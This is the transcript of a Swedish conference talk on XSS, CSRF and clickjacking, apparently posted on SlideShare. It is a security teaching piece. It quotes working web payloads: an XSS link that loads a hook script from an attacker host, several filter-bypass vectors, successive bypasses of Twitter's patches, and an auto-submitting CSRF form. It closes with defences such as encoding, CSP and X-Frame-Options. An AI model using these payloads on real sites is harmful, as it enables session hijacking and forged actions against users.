• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Tre sårbarheter i webbappar
 

Tre sårbarheter i webbappar

on

  • 820 views

Presentation of three web application vulnerabilities, in Swedish. Given at GeekMeet Stockhom, January 2013.

Presentation of three web application vulnerabilities, in Swedish. Given at GeekMeet Stockhom, January 2013.

Statistics

Views

Total Views
820
Views on SlideShare
819
Embed Views
1

Actions

Likes
2
Downloads
3
Comments
0

1 Embed 1

https://twitter.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Tre sårbarheter i webbappar Tre sårbarheter i webbappar Presentation Transcript

    • Tre sårbarheter i webappar @johnwilander, GeekMeet 2013
    • Alla demos finns i FOSS-projektethttp://1-liner.org
    • Tre sårbarheter i webbappar• Cross-Site Scripting (XSS)• Cross-Site Request Forgery (CSRF)• Clickjacking
    • Över 50 % är XSSKälla: IBM X-Force 2012 Mid-year Trend and Risk Report September 2012
    • Cross-Site Scripting Teori Scripting s-Site C ros
    • Cross-Site Scripting Typ 1, reflekterad Scripting Cross-Site Ph ish ing
    • Cross-Site Scripting Typ 2, lagrad s-S ite C ros
    • Cross-Site Scripting Typ 2, lagrad Scripting
    • Cross-Site Scripting Typ 0, DOM-baserad ng i pti Scr Cros s-Sit e Ph ish in g
    • Cross-Site Scripting Type 0, DOM-baserad ng i pti Scr Cros Inget anrop till servern! s-Sit e Single-page-appar gör att injicerade skript ”hänger Ph isini DOM:en. kvar” g
    • https://secure.example.com/authentication#language=sv&country=SE
    • https://secure.example.com/authentication#language=sv&country=SE Skickas aldrig till servern Var alltid försiktig med att använda data från URL:en, särskilt efter #.
    • Skulle du klicka på … https://secure.example.com/authentication#language=<script src="http://attackr.se:3000/ hook.js"></script>&country=SE
    • Skulle du klicka på …https://secure.example.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F %2Fattackr.se%3A3000%2Fhook.js%22%3E%3C %2Fscript%3E&country=SE
    • Skulle du klicka på … http://bit.ly/Yg4T32
    • Filtrera bort <script>?var ... , stripScriptsRe = /(?:<script.*?>)((n|r|.)*?)(?:</script>)/ig,/** * Strips all script tags * @param {Object} value The text from which to strip script tags * @return {String} The stripped text */stripScripts : function(v) { return !v ? v : String(v).replace(stripScriptsRe, "");}, http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
    • Filtrera bort <script>?<img src=1 onerror=alert(1)><svg onload="javascript:alert(1)"xmlns="http://www.w3.org/2000/svg"></svg><body onload=alert(XSS)><table background="javascript:alert(XSS)">¼script¾alert(¢XSS¢)¼/script¾<video poster=javascript:alert(1)//
    • ”Kom igen, sånt där funkar inte, va?” Jo. Demo.
    • DOM-baserad XSS Twitter september 2010Källa:http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
    • (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
    • Vad gör den här koden?(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
    • ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returnerar ”/johnwilander”(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
    • ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returnerar ”/johnwilander”(function(g){ window.location = var a = location.href.split("#!")[1]; ”/johnwilander” if(a) { ’/’ => behåller domänen men initialt g.location = a; ändrar path }})(window);
    • ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returnerar ”/johnwilander”(function(g){ window.location = var a = location.href.split("#!")[1]; ”/johnwilander” if(a) { ’/’ => behåller domänen men initialt g.location = a; ändrar path } Så})(window); twitter.com/#!/johnwilander blir twitter.com/johnwilander Read more: http://kotowicz.net/absolute/
    • http://twitter.com/#!javascript:alert(document.domain);
    • http://twitter.com/#!javascript:alert(document.domain); Skickas aldrig till servern => DOM-baserad XSS
    • The Patch™var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}
    • The Patch™var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;} Ersätter första träffen för sökkriteriet
    • http://twitter.com/#!javascript::alert(document.domain);
    • http://twitter.com/#!javascript::alert(document.domain);
    • The 2nd Patch™(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
    • (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp-avgränsare
    • (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp-avgränsare Global matchning
    • (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp-avgränsare Ignorera Global stor/liten matchning bokstav
    • Fääärdig?
    • http://twitter.com#!javascript&x58;alert(1)
    • http://twitter.com#!javascript&x58;alert(1) HTML entity för ’:’
    • The n:th Patch™ (den här funkar)(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; }})(window); Notera att Twitter faktiskt gör rätt: https://twitter.com/about/security
    • Lös sådana här problem på rätt sätt med Client-Side Encoding
    • https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize() Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>• $.encoder.encodeForCSS() Encodes for safe usage in style attribute and style()• $.encoder.encodeForHTML() Encodes for safe usage in innerHTML and html()• $.encoder.encodeForHTMLAttribute() Encodes for safe usage in HTML attributes• $.encoder.encodeForJavaScript() Encodes for safe usage in event handlers etc• $.encoder.encodeForURL() Encodes for safe usage in href etc
    • https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize() Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>• $.encoder.encodeForCSS() Encodes for safe usage in style attribute and style()• $.encoder.encodeForHTML() Encodes for safe usage in innerHTML and html()• $.encoder.encodeForHTMLAttribute() Encodes for safe usage in HTML attributes• $.encoder.encodeForJavaScript() Encodes for safe usage in event handlers etc• $.encoder.encodeForURL() Encodes for safe usage in href etc
    • En riktigt läbbig en:http://www.aol.com/
    • Skydd mot XSSContent Security Policy http://www.w3.org/TR/CSP/
    • Ny HTTP svars-header som säger ...Tillåt bara skript från godkända domänerochtillåt bara skript från filer, dvs inga inline-skript
    • self = samma URL, protokoll och portContent-Security-Policy: default-src selfLadda bara skript, plugins, css, bilder, ljud/video, frames, typsnitt ochdata från den egna domänenContent-Security-Policy: default-src self;img-src *; script-src trusted.comAcceptera bilder från valfri domän, skript från trusted.com,resterande bara från den egna domänen
    • CSRFmin favorit!
    • Cross-Site Request Forgery Request For gery Cro ss-S ite
    • Cross-Site Request Forgery Request Forgery Cros s-Site Ph ish ing
    • Får www.attackr.se ladda bilder så här: <img src=”https://secure.example.com/ logo.png" /> ?
    • Får www.attackr.se ladda bilder så här: <img src=”https://secure.example.com/authentication#language=sv&country=SE" /> ?
    • Med img-element så kan www.attackr.se tyst skicka HTTP GET till valfri domän <img src=”https://secure.example.com/ authentication#language=sv&country=SE" height=0 width=0 />
    • ”Hur är det med HTTP POST då?”
    • What’s on your mind? What’s on your mind? POST POST
    • What’s on your mind? What’s on your mind?I love OWASP! POST POST
    • What’s on your mind? What’s on your mind?I love OWASP! POST POSTJohn: I love OWASP!
    • What’s on your mind? What’s on your mind? POST POST
    • What’s on your mind? What’s on your mind? POST I hate OWASP! POST
    • What’s on your mind? What’s on your mind? POST I hate OWASP! POST
    • What’s on your mind? What’s on your mind? POST I hate OWASP! POSTJohn: I hate OWASP!
    • What’s on your mind? Look at the lol cat! POST <form id="target" method="POST" action="https://1-liner.org/form">John: I hate OWASP! <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/> </form> <script type="text/javascript"> $(document).ready(function() { $(#form).submit(); }); </script>
    • <form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit"What’s on your mind? What’s on your mind? value="POST"/> POST </form>John: I hate OWASP! <script> $(document).ready(function() { $(#target).submit(); }); </script>
    • csrfMulti.html invisible iframe csrfMulti0.html
    • csrfMulti.html invisible invisible iframe iframe target0.html csrfMulti1.html Wait
    • csrfMulti.html invisible invisible invisible iframe iframe iframe target0.html target1.html csrfMulti2.html Wait
    • csrfMulti.html invisible invisible invisible invisible iframe iframe iframe iframe target0.html target1.html target2.html csrfMulti3.html Wait
    • csrfMulti.html invisible invisible invisible invisible iframe iframe iframe iframe target0.html target1.html target2.html target3.html
    • Demo POST CSRF mot REST/json
    • Clickjacking... eller Likejacking eller Followjacking eller ...
    • Clickjacking-demo
    • X-Frame-Optionshttp://blogs.msdn.com/b/ie/archive/ 2009/01/27/ie8-security-part-vii- clickjacking-defenses.aspx http://tools.ietf.org/html/draft- gondrom-frame-options-01
    • Ingen sida får ladda mig i en iframeellerbara sidor på min egen domän fårladda mig i en iframe
    • X-Frame-Options: DENYX-Frame-Options: SAMEORIGIN(På gång:X-Frame-Options: ALLOW-FROM [list])
    • Intresserad?• Gå med i ditt lokala OWASP-chapter https://www.owasp.org/index.php/OWASP_Chapter• Börja följa de @0x6D6172696F @garethheyes @WisecWisec här personerna på Twitter: @securityninja @jeremiahg @kkotowicz @webtonull @manicode @securityshell• Börja hacka själv – det är kul! Bästa stället att börja? Dina sajter såklart. Håll det lagligt bara ;)